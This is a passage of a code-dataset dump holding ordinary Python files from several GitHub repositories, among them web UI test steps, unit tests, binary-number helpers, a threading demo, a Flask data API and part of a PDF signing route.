\"Test failed: couldn't find user with firstname {firstname} and lastname {lastname}\" \\\n .format(firstname=firstname, lastname=lastname)\n\n\n@when(\"I click on the confirm button\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=CONFIRM_BUTTON))\n\n@then(\"all users are marked as deleted\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"then I expect a success message\"\"\")\n rows = 
context.browser.find_elements_by_css_selector(USER_TABLE_ROW)\n for row in rows:\n if 'DELETED' not in row.text.upper():\n assert False, \"User not deleted\"\n\n\n@when(\"I set {checkbox_name} checkbox {status}\")\ndef step(context, checkbox_name, status):\n checkboxes = context.browser.find_elements_by_css_selector(CREATION_TOOLS_CHECKBOXES)\n for checkbox in checkboxes:\n if checkbox.text == checkbox_name:\n if status == 'enabled':\n action_on_checkbox(checkbox, 'enable')\n return\n elif status == 'disabled':\n action_on_checkbox(checkbox, 'disable')\n return\n else:\n assert False, \"Error, must provide enabled or disabled for creation tool checkbox\"\n assert False, \"Error, invalid checkbox name\"\n\n@when(\"I open the user page for blippar group\") #hard coded url with a group number in it but it's not a problem cause we use it only once in 6-hub-groups-and-users.feature\ndef step(context):\n url = urlparse.urljoin(context.config.userdata['target_env'], \"dashboard/group/7/users\")\n context.execute_steps(u\"\"\"when opening the url {url}\"\"\".format(url=url))\n\n@then(\"I wait up to {time} secs for the users to load\")\ndef step(context, time):\n context.execute_steps(u\"\"\"then wait up to {timeout} seconds for {selector}\"\"\".format(timeout=time, selector=USER_TABLE_ROW))\n\n#approve/disapprove the blipp\n@then('admin sets checkbox blipp {blipp_name} {status}')\ndef step_impl(context, blipp_name, status):\n checkboxes = context.browser.find_elements_by_css_selector(BLIPP_APPROVE_CHECKBOX)\n for checkbox in checkboxes:\n print(\"checkbox.text\", checkbox.text)\n if checkbox.text == blipp_name:\n if status == 'enabled':\n checkbox.click()\n return\n elif status == 'disabled':\n checkbox.click()\n return\n else:\n assert False, \"Error, must provide enabled or disabled for blipp approval checkbox\"\n assert False, \"Error, invalid checkbox name\"\n\n@then('the following fields are displayed {group_name},{group_type},{country},{license_date},{account_manager}')\ndef step(context, group_name, group_type, country,license_date, account_manager):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector=GROUP_NAME_TITLE))\n context.execute_steps(u\"\"\"then expect {selector} to contain {group_name}\"\"\".format(selector=GROUP_NAME_TITLE, group_name=group_name))\n context.execute_steps(u\"\"\"then expect {selector} to contain {group_type}\"\"\".format(selector=GROUP_TYPE_TITLE, group_type=group_type))\n context.execute_steps(u\"\"\"then expect {selector} to contain {country}\"\"\".format(selector=COUNTRY_TITLE, country=country))\n context.execute_steps(u\"\"\"then expect {selector} to contain {license_date}\"\"\".format(selector=LICENSE_START_TITLE, license_date=license_date))\n context.execute_steps(u\"\"\"then expect {selector} to contain {account_manager}\"\"\".format(selector=ACCOUNT_MANAGER_TITLE, account_manager=account_manager))\n\n@then('the Group type field contains {group_type}')\ndef step(context, group_type):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector=GROUP_TYPE_SELECTOR))\n context.execute_steps(u\"\"\"then expect {selector} to contain {group_type}\"\"\".format(selector=GROUP_TYPE_SELECTOR, group_type=group_type))\n","repo_name":"Syslog2905/Xentio_Python","sub_path":"features/steps/steps.groups_users.py","file_name":"steps.groups_users.py","file_ext":"py","file_size_in_byte":21134,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"22003202813","text":"from 
random import choices, randint\n\n\ndef add_binaries(a, b):\n    \"\"\"\n    Add two binary numbers.\n    \"\"\"\n\n    # we want a to be the higher number\n    la = len(a)\n    lb = len(b)\n    if lb > la:\n        a, b = b, a\n\n    i = la - 1\n    j = lb - 1\n    carry = 0\n    answer = ''\n\n    # sum numbers while there are bits on the smallest\n    while j >= 0:\n        cur = int(a[i]) + int(b[j]) + carry\n        answer = str(cur % 2) + answer\n        if cur > 1:\n            carry = 1\n        else:\n            carry = 0\n        i -= 1\n        j -= 1\n\n    # sum remaining bits from the longest\n    while i >= 0:\n        cur = int(a[i]) + carry\n        answer = str(cur % 2) + answer\n        if cur > 1:\n            carry = 1\n        else:\n            carry = 0\n        i -= 1\n\n    if carry:\n        answer = '1' + answer\n    return answer\n\n\ndef binary_to_decimal(number):\n    \"\"\"\n    Converts a binary number into a decimal number.\n    This function does not check if the string is only made of ones and zeros.\n\n    :param str number: string representing a binary number, e.g. '1011'\n    :return int: integer conversion\n    \"\"\"\n    l = len(number) - 1\n    i = 0\n    integer = 0\n\n    while l >= 0:\n        if number[l] == '1':\n            integer += 2 ** i\n        i += 1\n        l -= 1\n\n    return integer\n\n\ndef decimal_to_binary(number):\n    \"\"\"\n    Converts a decimal number to binary.\n\n    :param int: decimal number\n    :return str: string representing a binary number\n    \"\"\"\n    if number == 0:\n        return \"0\"\n    binary = \"\"\n    while number != 0:\n        remaining = number % 2\n        if remaining == 1:\n            binary = \"1\" + binary\n        else:\n            binary = \"0\" + binary\n        number //= 2\n    return binary\n","repo_name":"jschnab/leetcode","sub_path":"binary_numbers.py","file_name":"binary_numbers.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
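A quick round-trip check for the binary helpers in the record above: add two bit strings with `add_binaries()` and confirm the result against ordinary integer addition via the two conversion functions. This sketch relies only on the three functions defined in that record.

# Usage check for add_binaries / binary_to_decimal / decimal_to_binary above.
a, b = "1011", "110"            # 11 and 6 in binary
s = add_binaries(a, b)
print(s)                        # '10001'
assert binary_to_decimal(s) == binary_to_decimal(a) + binary_to_decimal(b) == 17
assert decimal_to_binary(binary_to_decimal(s)) == s   # conversions round-trip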
+{"seq_id":"35916883456","text":"#!/usr/bin/python\n########################################################################################################################\n# Joe's Python Experiments - Multithreading Test\n#-----------------------------------------------------------------------------------------------------------------------\n# \\file PythreadTest.py\n# \\creation 2015-03-04, Joe Merten\n#-----------------------------------------------------------------------------------------------------------------------\n# What happens here:\n# - one thread (by now 4) is started that keeps busy without any sleep (to see whether there is something like preemption)\n#   - worked with a for loop just as well as with perf_counter()\n#   - apparently only 1 CPU core is used\n# - a few signal handlers are registered (to check whether signals are still handled concurrently with the rest)\n# - 4 \"WorkerThreads\" are instantiated, which listen on a queue and wait there for work\n# - the queue is filled with \"work\"\n# - wait for the queue processing to complete (done by the worker threads)\n########################################################################################################################\n\nimport threading\nfrom queue import Queue\nimport time\nimport signal, os\n\n# lock to serialize console output\nlock = threading.Lock()\n\ndef doWork(item):\n    time.sleep(item) # pretend to do some lengthy work.\n    # Make sure the whole print completes or threads can mix up output in one line.\n    with lock: print(threading.current_thread().name, item)\n\n# The worker thread pulls an item from the queue and processes it\ndef workerThreadFunc():\n    while True:\n        item = q.get()\n        doWork(item)\n        q.task_done()\n\ndef startWorkerThreads():\n    for i in range(4):\n        t = threading.Thread(target=workerThreadFunc, name=i+1) #\"bla\"+str(i))\n        t.daemon = True # thread dies when main thread (only non-daemon thread) exits.\n        t.start()\n\ndef fillQueue():\n    for item in range(20): q.put(item)\n\n\ndef blockingThreadFunc():\n    while True:\n        start = time.perf_counter()\n        while True:\n            elapsed = time.perf_counter() - start\n            if elapsed > 5: break\n        #i=0\n        #while True:\n        #    i = i + 1\n        #    if i > 10000000: break\n        with lock: print(threading.current_thread().name, \"Hellö 𝘑𝘰𝘦 😎\")\n\ndef startBlockingThread():\n    for i in range(4):\n        bt = threading.Thread(target=blockingThreadFunc, name=\"Blocking \" + str(i+1))\n        bt.daemon = True\n        bt.start()\n\n\ndef signalHandler(signum, frame):\n    with lock: print('Signal handler called with signal', signum)\n    signal.alarm(1)\n\ndef setSignalHandlers():\n    signal.signal(signal.SIGALRM, signalHandler)\n    signal.signal(signal.SIGUSR1, signalHandler)\n    signal.signal(signal.SIGUSR2, signalHandler)\n\n\n# Main\nstart = time.perf_counter()\nsetSignalHandlers()\nstartBlockingThread()\nq = Queue()\nstartWorkerThreads()\nfillQueue()\nq.join() # block until all tasks are done\n\nprint('time: ', time.perf_counter() - start)","repo_name":"JoeMerten/PythonPlayground","sub_path":"PythreadTest.py","file_name":"PythreadTest.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"40647197264","text":"import unittest\nimport os\nimport grp\nfrom myDevices.sensors import sensors\nfrom myDevices.utils.version import MAPPING\nfrom myDevices.devices import manager\nfrom myDevices.utils.config import Config\nfrom myDevices.utils import types\nfrom myDevices.utils.logger import exception, setDebug, info, debug, error, logToFile, setInfo\nfrom myDevices.devices.bus import checkAllBus, BUSLIST\nfrom myDevices.devices.digital.gpio import NativeGPIO as GPIO\nfrom myDevices.devices import instance\nfrom time import sleep\nfrom json import loads, dumps\n\nclass SensorsClientTest(unittest.TestCase):\n    @classmethod\n    def setUpClass(cls):\n        cls.client = sensors.SensorsClient()\n\n    @classmethod\n    def tearDownClass(cls):\n        cls.client.StopMonitoring()\n        del cls.client\n        del GPIO.instance\n\n    def testBusInfo(self):\n        bus = SensorsClientTest.client.BusInfo()\n        # # 
Compare our GPIO function values with the ones from RPi.GPIO library\n # import RPi.GPIO\n # RPi.GPIO.setmode(RPi.GPIO.BCM)\n # port_use = {0:\"GPIO.OUT\", 1:\"GPIO.IN\", 40:\"GPIO.SERIAL\", 41:\"GPIO.SPI\", 42:\"GPIO.I2C\", 43:\"GPIO.HARD_PWM\", -1:\"GPIO.UNKNOWN\"}\n # for gpio in range(GPIO.GPIO_COUNT):\n # try:\n # print('{}: {} | {}'.format(gpio, bus['GPIO'][gpio]['function'], port_use[RPi.GPIO.gpio_function(gpio)]))\n # except ValueError as error:\n # print('{}: {}'.format(error, gpio))\n self.assertEqual(set(bus.keys()), set(['GpioMap', 'SPI', 'GPIO', 'ONEWIRE', 'I2C', 'UART']))\n\n def testSetFunction(self):\n self.setChannelFunction(5, 'IN')\n self.setChannelFunction(5, 'OUT')\n\n def testSetValue(self):\n self.setChannelValue(5, 1)\n self.setChannelValue(5, 0)\n\n def testSensors(self):\n #Test adding a sensor\n testSensor = {'description': 'Digital Input', 'device': 'DigitalSensor', 'args': {'gpio': 'GPIO', 'invert': False, 'channel': 12}, 'name': 'testdevice'}\n compareKeys = ('args', 'description', 'device')\n retValue = SensorsClientTest.client.AddSensor(testSensor['name'], testSensor['description'], testSensor['device'], testSensor['args'])\n self.assertTrue(retValue)\n retrievedSensor = next(obj for obj in SensorsClientTest.client.GetDevices() if obj['name'] == testSensor['name'])\n for key in compareKeys:\n self.assertEqual(testSensor[key], retrievedSensor[key])\n #Test updating a sensor\n editedSensor = testSensor\n editedSensor['args']['channel'] = 13\n retValue = SensorsClientTest.client.EditSensor(editedSensor['name'], editedSensor['description'], editedSensor['device'], editedSensor['args'])\n self.assertTrue(retValue)\n retrievedSensor = next(obj for obj in SensorsClientTest.client.GetDevices() if obj['name'] == editedSensor['name'])\n for key in compareKeys:\n self.assertEqual(editedSensor[key], retrievedSensor[key])\n #Test removing a sensor\n retValue = SensorsClientTest.client.DeleteSensor(testSensor['name'])\n self.assertTrue(retValue)\n deviceNames = [device['name'] for device in SensorsClientTest.client.GetDevices()]\n self.assertNotIn(testSensor['name'], deviceNames)\n\n def testSensorInfo(self):\n sensors = {'actuator' : {'description': 'Digital Output', 'device': 'DigitalActuator', 'args': {'gpio': 'GPIO', 'invert': False, 'channel': 16}, 'name': 'test_actuator'},\n 'light_switch' : {'description': 'Light Switch', 'device': 'LightSwitch', 'args': {'gpio': 'GPIO', 'invert': True, 'channel': 15}, 'name': 'test_light_switch'},\n 'MCP3004' : {'description': 'MCP3004', 'device': 'MCP3004', 'args': {'chip': '0'}, 'name': 'test_MCP3004'},\n 'distance' : {'description': 'Analog Distance Sensor', 'device': 'DistanceSensor', 'args': {'adc': 'test_MCP3004', 'channel': 0}, 'name': 'test_distance'}}\n for sensor in sensors.values():\n SensorsClientTest.client.AddSensor(sensor['name'], sensor['description'], sensor['device'], sensor['args'])\n SensorsClientTest.client.SensorsInfo()\n #Test setting sensor values\n self.setSensorValue(sensors['actuator'], 1)\n self.setSensorValue(sensors['actuator'], 0)\n self.setSensorValue(sensors['light_switch'], 1)\n self.setSensorValue(sensors['light_switch'], 0)\n #Test getting analog value\n retrievedSensorInfo = next(obj for obj in SensorsClientTest.client.SensorsInfo() if obj['name'] == sensors['distance']['name'])\n self.assertEqual(retrievedSensorInfo['float'], 0.0)\n for sensor in sensors.values():\n self.assertTrue(SensorsClientTest.client.DeleteSensor(sensor['name']))\n\n def testSystemInfo(self):\n system_info = 
SensorsClientTest.client.SystemInformation()\n        self.assertEqual(set(system_info.keys()), set(['Storage', 'Cpu', 'CpuLoad', 'Uptime', 'Network', 'Memory']))\n\n    def setSensorValue(self, sensor, value):\n        SensorsClientTest.client.SensorCommand('integer', sensor['name'], sensor['device'], None, None, None, value)\n        sensorInfo = next(obj for obj in SensorsClientTest.client.SensorsInfo() if obj['name'] == sensor['name'])\n        self.assertEqual(value, sensorInfo['value'])\n\n    def setChannelFunction(self, channel, function):\n        SensorsClientTest.client.gpio.setFunctionString(channel, function)\n        bus = SensorsClientTest.client.BusInfo()\n        self.assertEqual(function, bus['GPIO'][channel]['function'])\n\n    def setChannelValue(self, channel, value):\n        SensorsClientTest.client.gpio.digitalWrite(channel, value)\n        bus = SensorsClientTest.client.BusInfo()\n        self.assertEqual(value, bus['GPIO'][channel]['value'])\n\nif __name__ == '__main__':\n    setInfo()\n    unittest.main()\n","repo_name":"mongrelx/Cayenne-Agent","sub_path":"myDevices/test/client_test.py","file_name":"client_test.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"}
+{"seq_id":"9788367385","text":"import wgsunifrac as wu\nimport argparse\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"Get pcoa plot of taxonomic profiles in a directory.\")\n    parser.add_argument('-dir', '--dir', type=str, help=\"The directory where profiles are located.\")\n    parser.add_argument('-t', '--plt_title', type=str, help=\"Title of the pcoa plot.\")\n    parser.add_argument('-a', '--alpha', type=float, help=\"The factor for branch length function. -1, -0.5, 0, 1, 5\")\n    parser.add_argument('-by', '--by', type=str, help=\"For real data. choices: bodysites, study\",default=\"bodysites\")\n    parser.add_argument('-type', '--data_type', type=str, help=\"real or simulated.\")\n    parser.add_argument('-s', '--save', type=str, help=\"File name to save file as.\") \n\n    args = parser.parse_args()\n    dir = args.dir\n    plt_title = args.plt_title\n    alpha = args.alpha\n    dtype = args.data_type\n    by = args.by\n\n    if dtype == \"simulated\":\n        # The original also called an undefined \"tu\" module here; only the\n        # wu call below is resolvable from the imports.\n        wu.pairwise_unifrac(dir, plt_title, alpha)\n    else:\n        #real data\n        metadata = wu.get_metadata_from_real_data_partial('data/body_sites12261.csv', dir)\n        dist_matrix, sample_lst = wu.just_pairwise_unifrac(dir, alpha)\n        wu.get_pcoa(dist_matrix,sample_lst,metadata,plt_title,args.save)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"KoslickiLab/WGSUniFrac-reproducibles","sub_path":"get_wgs_pcoa_plot.py","file_name":"get_wgs_pcoa_plot.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"39771532442","text":"from twisted.internet.defer import inlineCallbacks\nfrom src.utils.test_utils import DottTestCase\nfrom src.daemons.server.commands.parser import CommandParser, ParsedCommand\nfrom src.daemons.server.commands.cmdtable import CommandTable, DuplicateCommandException\nfrom src.daemons.server.commands.command import BaseCommand\n\n\nclass CommandTableTests(DottTestCase):\n\n    @inlineCallbacks\n    def setUp(self):\n        yield super(CommandTableTests, self).setUp()\n\n        self.table = CommandTable()\n\n    @inlineCallbacks\n    def tearDown(self):\n        yield super(CommandTableTests, self).tearDown()\n\n        del self.table\n\n    def test_add_and_lookup(self):\n        \"\"\"\n        Tests some simple success cases. 
A fake command is added to the\n command table, we perform some lookups.\n \"\"\"\n # Create a fake command to add to the command table.\n cmd = BaseCommand()\n # This is the full name for the command.\n cmd.name = 'test'\n # The command can also be called with these values.\n cmd.aliases = ['t']\n # Add command to command table.\n self.table.add_command(cmd)\n\n # Perform a name-based lookup for the command. Result should be the\n # BaseCommand() instance we created earlier.\n self.assertIs(self.table.match_name('test'), cmd)\n # Same as above, but this time look for alias matches.\n self.assertIs(self.table.match_alias('t'), cmd)\n\n # Now take a step back and create a fake parsed command (from the user).\n # This is as if a user typed 'test'.\n parsed = ParsedCommand('test', [], [])\n # Hand the command off to the command table and ask it to return\n # a match, if there is one. This should match the previously created\n # test command.\n self.assertIs(self.table.lookup_command(parsed), cmd)\n # Now make the input something that definitely isn't in the command\n # table. The return value should be None, meaning no match.\n parsed.command_str = 'invalid'\n self.assertEqual(self.table.lookup_command(parsed), None)\n\n def test_add_duplicate_name(self):\n \"\"\"\n Tries to add a duplicate (name) command.\n \"\"\"\n cmd = BaseCommand()\n cmd.name = 'test'\n self.table.add_command(cmd)\n\n cmd2 = BaseCommand()\n cmd2.name = 'test'\n # This is a duplicate, should raise exception.\n self.assertRaises(DuplicateCommandException, self.table.add_command, cmd2)\n\n def test_add_duplicate_alias(self):\n \"\"\"\n Tries to add a duplicate (alias) command.\n \"\"\"\n cmd = BaseCommand()\n cmd.name = 'cmd'\n cmd.aliases = ['l', 't']\n self.table.add_command(cmd)\n\n cmd2 = BaseCommand()\n cmd2.name = 'cmd2'\n cmd2.aliases = ['g', 't']\n # This is a duplicate, should raise exception.\n self.assertRaises(DuplicateCommandException, self.table.add_command, cmd2)\n\n\nclass CommandParserTests(DottTestCase):\n\n @inlineCallbacks\n def setUp(self):\n yield super(CommandParserTests, self).setUp()\n\n self.parser = CommandParser()\n\n @inlineCallbacks\n def tearDown(self):\n yield super(CommandParserTests, self).tearDown()\n\n del self.parser\n\n def test_simple_command(self):\n \"\"\"\n Parses a simple command with no args.\n \"\"\"\n parsed = self.parser.parse('look')\n self.assertIsInstance(parsed, ParsedCommand)\n self.assertEquals(parsed.command_str, 'look')\n self.assertEquals(parsed.arguments, [])\n self.assertEquals(parsed.switches, set([]))\n\n def test_command_with_arguments(self):\n \"\"\"\n Throw some arguments in as well.\n \"\"\"\n parsed = self.parser.parse('look ship')\n self.assertEquals(parsed.command_str, 'look')\n self.assertEquals(parsed.arguments, ['ship'])\n self.assertEquals(parsed.switches, set([]))\n\n parsed = self.parser.parse('look ship hi')\n self.assertEquals(parsed.arguments, ['ship', 'hi'])\n\n def test_command_with_switches_and_arguments(self):\n \"\"\"\n The whole she-bang.\n \"\"\"\n parsed = self.parser.parse('look/quiet ship')\n self.assertEquals(parsed.command_str, 'look')\n self.assertEquals(parsed.arguments, ['ship'])\n self.assertEquals(parsed.switches, {'quiet'})\n\n def test_poses(self):\n \"\"\"\n Poses have some shortcuts that are handled differently. 
Test those\n here, for the MUX/MUSH/MOO folks.\n \"\"\"\n parsed = self.parser.parse(':taunts you.')\n self.assertEquals(parsed.command_str, 'emote')\n self.assertEquals(parsed.arguments, ['taunts', 'you.'])\n self.assertEquals(parsed.switches, set([]))\n\n parsed = self.parser.parse(\";'s face is weird.\")\n self.assertEquals(parsed.command_str, 'emote')\n self.assertEquals(parsed.arguments, [\"'s\", 'face', 'is', 'weird.'])\n self.assertEquals(parsed.switches, {'nospace'})","repo_name":"gtaylor/dott","sub_path":"src/daemons/server/commands/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"35"} +{"seq_id":"19221105280","text":"import pandas as pd\n\nfrom powerline.finance.auction import TradingAlgorithmAuction, \\\n BeforeEpexAuction\n\n__author__ = 'Warren'\n\n\nclass TestAuctionAlgorithm(TradingAlgorithmAuction):\n \"\"\"\n This algorithm will send a specified number of orders, to allow unit tests\n to verify the orders sent/received, transactions created, and positions\n at the close of a simulation.\n \"\"\"\n\n def initialize(self,\n sid,\n amount,\n order_count,\n day,\n sid_filter=None,\n slippage=None,\n commission=None):\n self.count = order_count\n self.asset = self.sid(sid)\n self.amount = amount\n self.day = day\n self.incr = 0\n\n self.prog = pd.DataFrame()\n\n if sid_filter:\n self.sid_filter = sid_filter\n else:\n self.sid_filter = [self.asset.sid]\n\n if slippage is not None:\n self.set_slippage(slippage)\n\n if commission is not None:\n self.set_commission(commission)\n\n self.schedule_function(func=self.auction, time_rule=BeforeEpexAuction(\n minutes=30))\n\n def handle_data(self, data):\n pass\n","repo_name":"warren-oneill/powerline","sub_path":"powerline/test_algorithms.py","file_name":"test_algorithms.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"12763340520","text":"import casadi as ca\nimport numpy as np\nimport pytest \n\nfrom forwardkinematics.urdfFks.pandaFk import PandaFk\nfrom forwardkinematics.urdfFks.urdfFk import LinkNotInURDFError\n\n@pytest.fixture\ndef fk():\n return PandaFk()\n\ndef test_pandaFk(fk):\n q_ca = ca.SX.sym(\"q\", 7)\n q_np = np.random.random(7)\n fkCasadi = fk.fk(q_ca, 7, positionOnly=False)\n fkNumpy = fk.fk(q_np, 7, positionOnly=False)\n assert isinstance(fkCasadi, ca.SX)\n assert isinstance(fkNumpy, np.ndarray)\n\ndef test_pandaFkByName(fk):\n q_ca = ca.SX.sym('q', 7)\n q_np = np.random.random(7)\n fkCasadi = fk.fk_by_name(q_ca, 'panda_link3', positionOnly=False)\n assert isinstance(fkCasadi, ca.SX)\n\ndef test_pandafkByWrongName(fk):\n q_ca = ca.SX.sym('q', 7)\n with pytest.raises(LinkNotInURDFError):\n fkCasadi = fk.fk_by_name(q_ca, 'panda_link10', positionOnly=False)\n\ndef test_simpleFk(fk):\n q_np = np.array([0.0000, 1.0323, 0.0000, 0.8247, 0.0000, 0.2076, 0.0000])\n fkNumpy = fk.fk(q_np, 0, positionOnly=True)\n x_ee = np.array([0.0, 0.0, 0.0])\n assert fkNumpy[0] == pytest.approx(x_ee[0], abs=1e-4)\n assert fkNumpy[1] == pytest.approx(x_ee[1], abs=1e-4)\n assert fkNumpy[2] == pytest.approx(x_ee[2], abs=1e-4)\n fkNumpy = fk.fk(q_np, 1, positionOnly=True)\n x_ee = np.array([0.2713, 0.0, 0.4950])\n assert fkNumpy[0] == pytest.approx(x_ee[0], abs=1e-4)\n assert fkNumpy[1] == pytest.approx(x_ee[1], abs=1e-4)\n assert fkNumpy[2] == pytest.approx(x_ee[2], abs=1e-4)\n fkNumpy = fk.fk(q_np, 7, positionOnly=True)\n 
x_ee = np.array([0.4, 0.0, 0.69])\n assert fkNumpy[0] == pytest.approx(x_ee[0], abs=1e-4)\n assert fkNumpy[1] == pytest.approx(x_ee[1], abs=1e-4)\n assert fkNumpy[2] == pytest.approx(x_ee[2], abs=1e-4)\n","repo_name":"maxspahn/forwardKinematics","sub_path":"tests/test_pandaFk.py","file_name":"test_pandaFk.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"75238882659","text":"import pandas as pd\nfrom flask import Flask, render_template, jsonify, redirect, \\\n request, session, g, url_for, abort\nfrom flask_sqlalchemy import SQLAlchemy\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\nimport sqlite3\nimport os\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Database Setup\n#################################################\n# The database URI\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = os.environ.get('DATABASE_URL', '') or \"sqlite:///biodiversity/db/belly_button_biodiversity.sqlite\"\n\ndb = SQLAlchemy(app)\n\nengine = create_engine(\"sqlite:///biodiversity/db/belly_button_biodiversity.sqlite\")\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\nOtu = Base.classes.otu\nSamples = Base.classes.samples\nSamples_metadata = Base.classes.samples_metadata\n\nsession = Session(bind=engine)\n\n#################################################\n# Flask Routes\n#################################################\n@app.route(\"/\")\ndef home():\n \"\"\"Render Home Page.\"\"\"\n return render_template(\"index.html\")\n\n@app.route(\"/names\")\ndef names():\n \"\"\"Return emoji score and emoji char\"\"\"\n\n names = Base.metadata.tables[\"samples\"].columns.keys()[1:]\n return jsonify(names)\n\n@app.route(\"/otu\")\ndef otu():\n\n otus = session.query(Otu.lowest_taxonomic_unit_found).all()\n otus = [otu[0] for otu in otus]\n return jsonify(otus)\n\n@app.route(\"/metadata/\")\ndef metadata(sample):\n target = sample.split(\"_\")[1]\n metadata = session.query(Samples_metadata.AGE, Samples_metadata.BBTYPE, Samples_metadata.ETHNICITY, Samples_metadata.GENDER, Samples_metadata.LOCATION, Samples_metadata.SAMPLEID).filter(Samples_metadata.SAMPLEID == target).all()\n \n metadata_list = {}\n metadata_list[\"AGE\"] = metadata[0][0]\n metadata_list[\"BBTYPE\"] = metadata[0][1]\n metadata_list[\"ETHNICITY\"] = metadata[0][2]\n metadata_list[\"GENDER\"] = metadata[0][3]\n metadata_list[\"LOCATION\"] = metadata[0][4]\n metadata_list[\"SAMPLEID\"] = metadata[0][5]\n\n metadata_list = jsonify(metadata_list)\n\n return metadata_list\n\n@app.route(\"/wfreq/\")\ndef wfreq(sample):\n target = sample.split(\"_\")[1]\n wfreq = session.query(Samples_metadata.WFREQ).filter(Samples_metadata.SAMPLEID == target).all()\n return jsonify(wfreq)\n\n@app.route(\"/samples/\")\ndef samples(sample):\n query = session.query(Samples)\n sample_df = pd.read_sql(query.statement, query.session.bind)\n \n sample_series = sample_df[sample]\n otu_series = sample_df[\"otu_id\"]\n\n df = pd.DataFrame({\"1\": otu_series, \"2\": sample_series})\n df = df.loc[df[\"2\"] != 0].sort_values(by=['2'], ascending=False)\n\n otu_ids = list(map(int, df[\"1\"].values))\n values = list(map(int, df[\"2\"].values))\n \n return jsonify({\"otu_ids\": otu_ids, \"sample_values\": values})\n\nif __name__ == 
'__main__':\n app.run(debug=True)\n","repo_name":"cherngywh/Interactive-Visualizations-and-Dashboards","sub_path":"biodiversity/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"11871898820","text":"from io_utils import *\nimport json\n\nclass Theme:\n def __init__(self, *args, **kwargs):\n self.id = kwargs.get(\"id\")\n self.name = kwargs.get(\"name\")\n self.language = kwargs.get(\"language\")\n self.stylesheets = kwargs.get(\"stylesheets\")\n self.legal = kwargs.get(\"legal\")\n self.logo = kwargs.get(\"logo\")\n self.css_variables = kwargs.get(\"css_variables\")\n\n @staticmethod\n def parse_theme(filename):\n with open(filename) as fh:\n obj = json.load(fh)\n \n return Theme(\n id = obj['id'],\n name = obj['name'],\n language = obj['language'],\n stylesheets = obj['stylesheets'],\n legal = obj['legal'],\n logo = obj['logo'],\n css_variables = obj['css_variables'],\n )\n @staticmethod\n def load_themes(dir):\n themes = {}\n for file in expand_glob(dir,\"*.theme\"): \n theme = Theme.parse_theme(file)\n themes[theme.id] = theme\n return themes\n\n\n","repo_name":"kwrl/kwrl_build","sub_path":"themes.py","file_name":"themes.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73584181862","text":"import uuid\n\nfrom os.path import basename\nfrom os.path import exists\nfrom os.path import join\n\nfrom flask import Blueprint, request\nfrom flask import current_app\nfrom flask import make_response\nfrom flask import render_template\nfrom pkiexpress import PadesSigner\nfrom pkiexpress import standard_signature_policies\n\nfrom sample.pades_visual_elements_express import PadesVisualElementsExpress\nfrom sample.storage_mock import create_app_data\nfrom sample.storage_mock import get_pdf_stamp_path\nfrom sample.utils import get_expired_page_headers\nfrom sample.utils import set_pki_defaults\n\n# 26-08-2022\n# By further inspecting in the latest Blueprint documentation (https://flask.palletsprojects.com/en/2.2.x/api/#blueprint-objects), \n# when creating a Blueprint object, the first parameter (name) is prepend to the URL endpoint. Therefore, Blueprint no longer \n# allows dots in the name since it would break the URL entirely.\n__name__ = __name__.replace(\".\",\"/\")\nblueprint = Blueprint(basename(__name__), __name__, \n url_prefix='/pades-server-key-express')\n\n\n@blueprint.route('/')\ndef index(file_id):\n \n # Verify if the provided \"file_id\" exists.\n file_path = join(current_app.config['APPDATA_FOLDER'], file_id)\n if not exists(file_path):\n return render_template('error.html', msg='File not found')\n\n # Get an instance of the PadesSigner class, responsible for receiving\n # the signature elements and performing the local signature.\n signer = PadesSigner()\n\n # Set PKI default options (see utils.py).\n set_pki_defaults(signer)\n\n # Set signature policy.\n signer.signature_policy = standard_signature_policies.PADES_BASIC_WITH_LTV\n\n # Set PDF to be signed.\n signer.set_pdf_to_sign_from_path(file_path)\n\n # Set the PKCS #12 certificate path. There is a logic for choosing the generate the PKCS #12\n # from \"issue certificate\" samples or a sample PKCS #12. 
